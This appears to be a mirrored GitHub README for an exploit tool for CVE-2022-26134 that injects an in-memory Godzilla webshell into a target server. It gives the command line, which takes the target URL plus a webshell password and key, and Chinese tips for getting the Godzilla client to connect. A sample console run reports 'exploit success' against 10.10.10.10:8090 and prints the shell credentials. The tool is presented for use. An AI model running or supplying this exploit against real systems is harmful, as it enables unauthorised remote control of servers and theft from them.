2022-06-07 18:35:18 +08:00
2022-06-07 17:20:07 +08:00
2022-06-07 18:35:18 +08:00
2022-06-07 17:20:07 +08:00
2022-06-07 18:32:47 +08:00

CVE-2022-26134-Godzilla-MEMSHELL

Usage

java -jar CVE-2022-26134.jar 哥斯拉密码 哥斯拉密钥

example
        java -jar CVE-2022-26134.jar pass key

如果内存Shell已经注入成功但哥斯拉无法连接,请在请求配置添加以下协议头或者为哥斯拉配置Burp代理

Connection: close

image


C:\CVE_2022_26134_jar>java -jar CVE-2022-26134.jar http://10.10.10.10:8090/ pass key
[*] url: http://10.10.10.10:8090/
[*] send payload
[*] exploit success
[*] godzilla webshell password : pass
[*] godzilla webshell key : key

C:\CVE_2022_26134_jar>

image

S
Description
Automated archival mirror of github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL
Readme 810 KiB
Languages
Java 94%
JavaScript 6%